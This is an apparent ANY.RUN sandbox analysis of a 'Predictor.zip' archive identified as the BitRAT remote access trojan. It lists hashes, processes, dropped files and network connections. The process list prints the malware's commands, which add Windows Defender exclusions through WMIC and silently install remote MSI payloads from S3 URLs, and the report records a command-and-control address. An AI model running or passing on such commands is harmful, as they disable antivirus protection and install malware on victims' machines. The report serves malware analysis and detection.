File name:

Predictor.zip

Full analysis: https://app.any.run/tasks/cb155241-20d8-4544-b8fb-bc094c6b4a41
Verdict: Malicious activity
Threats:

Remote access trojans (RATs) are a type of malware that enables attackers to establish complete to partial control over infected computers. Such malicious programs often have a modular design, offering a wide range of functionalities for conducting illicit activities on compromised systems. Some of the most common features of RATs include access to the users’ data, webcam, and keystrokes. This malware is often distributed through phishing emails and links.

Analysis date: October 20, 2020, 13:45:25
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
bitrat
rat
Indicators:
MIME: application/zip
File info: Zip archive data, at least v1.0 to extract
MD5:

DC8750DE25E8A8978564C563ABB3B4D9

SHA1:

EE99A86A84BEAA9F9CEE8CB95AD91688327CC8C4

SHA256:

0A49C8402432452F05CE2FBF9014E2B0B6E3D065A6048725AF77DB57F0F24F57

SSDEEP:

393216:mZBLxYL1qTCXEAY9xFI2zoI8qbk4T0opRrZP:gPWEAY9xFdfhk94Rrx

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • Predictor v7.23.2.exe (PID: 3732)
      • rezaza.exe (PID: 2920)
      • QVhqPEnbQOXYtZf6.exe (PID: 3492)
      • Predictor v7.23.2.exe (PID: 2520)
    • Uses Microsoft Installer as loader

      • Predictor v7.23.2.exe (PID: 2520)
    • Changes settings of System certificates

      • msiexec.exe (PID: 3412)
    • Changes the autorun value in the registry

      • rezaza.exe (PID: 2920)
    • Connects to CnC server

      • rezaza.exe (PID: 2920)
    • BITRAT was detected

      • rezaza.exe (PID: 2920)
  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • WinRAR.exe (PID: 1076)
      • rezaza.exe (PID: 2920)
      • expand.exe (PID: 3972)
      • msiexec.exe (PID: 3412)
    • Creates files in the Windows directory

      • expand.exe (PID: 3972)
    • Reads Internet Cache Settings

      • rezaza.exe (PID: 2920)
      • msiexec.exe (PID: 3412)
    • Adds / modifies Windows certificates

      • msiexec.exe (PID: 3412)
    • Starts CMD.EXE for commands execution

      • Predictor v7.23.2.exe (PID: 2520)
  • INFO

    • Application launched itself

      • msiexec.exe (PID: 3412)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xpi | Mozilla Firefox browser extension (66.6)
.zip | ZIP compressed archive (33.3)

EXIF

ZIP

ZipRequiredVersion: 10
ZipBitFlag: -
ZipCompression: None
ZipModifyDate: 2020:10:18 00:43:14
ZipCRC: 0x00000000
ZipCompressedSize: -
ZipUncompressedSize: -
ZipFileName: Predictor/
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
55
Monitored processes
13
Malicious processes
3
Suspicious processes
2

Behavior graph

Click at the process to see the details
drop and start drop and start start drop and start winrar.exe predictor v7.23.2.exe no specs predictor v7.23.2.exe wmic.exe no specs wmic.exe no specs msiexec.exe no specs msiexec.exe msiexec.exe no specs expand.exe #BITRAT rezaza.exe cmd.exe no specs msiexec.exe no specs qvhqpenbqoxytzf6.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1076"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Predictor.zip"C:\Program Files\WinRAR\WinRAR.exe
explorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.60.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
1880"C:\Windows\System32\wbem\WMIC.exe" /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath=C:\Users\admin\AppData\RoamingC:\Windows\System32\wbem\WMIC.exePredictor v7.23.2.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
WMI Commandline Utility
Exit code:
2147749902
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\wbem\wmic.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
2080"C:\Windows\System32\cmd.exe" taskkill / IM msiexec.exeC:\Windows\System32\cmd.exePredictor v7.23.2.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
2300"C:\Windows\System32\wbem\WMIC.exe" /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath=C:\Users\admin\AppData\LocalC:\Windows\System32\wbem\WMIC.exePredictor v7.23.2.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
WMI Commandline Utility
Exit code:
2147749902
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\wbem\wmic.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
2520"C:\Users\admin\AppData\Local\Temp\Rar$EXb1076.38897\Predictor\Predictor v7.23.2.exe" C:\Users\admin\AppData\Local\Temp\Rar$EXb1076.38897\Predictor\Predictor v7.23.2.exe
WinRAR.exe
User:
admin
Company:
TODO: <Company name>
Integrity Level:
HIGH
Description:
Projectcalcule
Exit code:
0
Version:
1.0.0.1
Modules
Images
c:\users\admin\appdata\local\temp\rar$exb1076.38897\predictor\predictor v7.23.2.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\mfc140u.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\vcruntime140.dll
2920"C:\Users\admin\AppData\Local\Temp\MW-b779d397-3981-4fe0-9dd0-c3d013ec61a5\files\rezaza.exe" C:\Users\admin\AppData\Local\Temp\MW-b779d397-3981-4fe0-9dd0-c3d013ec61a5\files\rezaza.exe
MsiExec.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
Modules
Images
c:\users\admin\appdata\local\temp\mw-b779d397-3981-4fe0-9dd0-c3d013ec61a5\files\rezaza.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\user32.dll
3072"C:\Windows\System32\msiexec.exe" /i https://plugsa.s3.eu-west-2.amazonaws.com/reza.msi /qnC:\Windows\System32\msiexec.exePredictor v7.23.2.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows® installer
Exit code:
1618
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\msiexec.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
3228"C:\Windows\System32\msiexec.exe" /i https://plugsa.s3.eu-west-2.amazonaws.com/rezaza.msi /qnC:\Windows\System32\msiexec.exePredictor v7.23.2.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows® installer
Exit code:
0
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\msiexec.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
3412C:\Windows\system32\msiexec.exe /VC:\Windows\system32\msiexec.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Exit code:
0
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\msiexec.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
3492"C:\Users\admin\AppData\Local\Temp\QVhqPEnbQOXYtZf6.exe" C:\Users\admin\AppData\Local\Temp\QVhqPEnbQOXYtZf6.exerezaza.exe
User:
admin
Integrity Level:
HIGH
Description:
Stub9
Exit code:
0
Version:
1.0.0.0
Modules
Images
c:\users\admin\appdata\local\temp\qvhqpenbqoxytzf6.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
Total events
1 689
Read events
1 602
Write events
87
Delete events
0

Modification events

(PID) Process:(1076) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation:writeName:ShellExtBMP
Value:
(PID) Process:(1076) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation:writeName:ShellExtIcon
Value:
(PID) Process:(1076) WinRAR.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\13B\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(1076) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\AppData\Local\Temp\Predictor.zip
(PID) Process:(1076) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(1076) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(1076) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
(PID) Process:(1076) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:mtime
Value:
100
(PID) Process:(1076) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface
Operation:writeName:ShowPassword
Value:
0
(PID) Process:(1076) WinRAR.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
Executable files
13
Suspicious files
5
Text files
84
Unknown types
2

Dropped files

PID
Process
Filename
Type
1076WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXb1076.38897\Predictor\AntiBusteds (2).dlltext
MD5:113F80EE3DC312A093CE9E89F95404FE
SHA256:8D3C4839E54881B05E93887868F5ACD25E4A1B40A2C21239BB028A20D801D301
1076WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXb1076.38897\Predictor\AntiBusteds (1).dlltext
MD5:113F80EE3DC312A093CE9E89F95404FE
SHA256:8D3C4839E54881B05E93887868F5ACD25E4A1B40A2C21239BB028A20D801D301
1076WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXb1076.38897\Predictor\Data\Ankama Helsa.dllexecutable
MD5:1F8DB83C98BC6528589B061BD7055472
SHA256:93D519B30A7D388FA983B14C94119088C3C3EA91512FE42D104E5343AA0F38E8
1076WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXb1076.38897\Predictor\include\cobject.htext
MD5:D6E7C73D1BC041419AF7D022C0380162
SHA256:D0101474D455F4875B51852518C7FCE359373708147936727697F2B0EC5764BE
1076WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXb1076.38897\Predictor\include\ceval.htext
MD5:AC76D8E98C4419356787EF0F0A70955C
SHA256:A50DDF6E874CFD1FD226080BF31E4636A2F5FAD806A4116CBD68EDB612932515
1076WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXb1076.38897\Predictor\include\compile.htext
MD5:6DB3A4D691BFEF1B49E980ECF1139800
SHA256:49300611716876EA81C4720A39EA89195F92179B66E8315E67915E47BA430D2E
1076WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXb1076.38897\Predictor\include\classobject.htext
MD5:9F318B9C5346A94372C3E37C0BAF8421
SHA256:DF989BBB7B1A425821BC68E1ECA9CD745C12932AA02EFCC83D700B47F013D04E
1076WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXb1076.38897\Predictor\include\code.htext
MD5:88EAD33E0041F48BF668C8F0BE198066
SHA256:17E23DC9CEC23F7EAC8839EAD6F0D276D4697A3659B3560D9BE28B3B58C7A15C
1076WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXb1076.38897\Predictor\include\codecs.htext
MD5:E6925D7D994B61C347D437A5368B3701
SHA256:AFBBB487A45D9D9202D0FD6A1167CC8718B6EC3B2AFA758F1708FBFEC99ADF86
1076WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXb1076.38897\Predictor\include\datetime.htext
MD5:958421EA055F38A3A54538A6C84795D5
SHA256:A80CA694DCCFE8EE65E3BBD2DFC57ADF2BE9464CA37EFE2B84471FF1FD61CDE7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
4
DNS requests
3
Threats
1

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2920
rezaza.exe
GET
200
93.184.220.29:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTuqL92L3tjkN67RNFF%2FEdvT6NEzAQUwBKyKHRoRmfpcCV0GgBFWwZ9XEQCEAdpsdVygbqahES8p3NLYzE%3D
US
der
471 b
whitelisted
2920
rezaza.exe
GET
200
93.184.220.29:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAGC%2BAmOouYmuRo7J4Qfua8%3D
US
der
1.47 Kb
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2920
rezaza.exe
185.244.128.7:9944
malicious
3412
msiexec.exe
52.95.150.26:443
plugsa.s3.eu-west-2.amazonaws.com
Amazon.com, Inc.
GB
shared
2920
rezaza.exe
52.95.149.98:443
drtus.s3.eu-west-2.amazonaws.com
Amazon.com, Inc.
GB
shared
2920
rezaza.exe
93.184.220.29:80
ocsp.digicert.com
MCI Communications Services, Inc. d/b/a Verizon Business
US
whitelisted

DNS requests

Domain
IP
Reputation
plugsa.s3.eu-west-2.amazonaws.com
  • 52.95.150.26
shared
drtus.s3.eu-west-2.amazonaws.com
  • 52.95.149.98
shared
ocsp.digicert.com
  • 93.184.220.29
whitelisted

Threats

PID
Process
Class
Message
2920
rezaza.exe
A Network Trojan was detected
ET TROJAN Observed Malicious SSL Cert (BitRAT CnC)
No debug info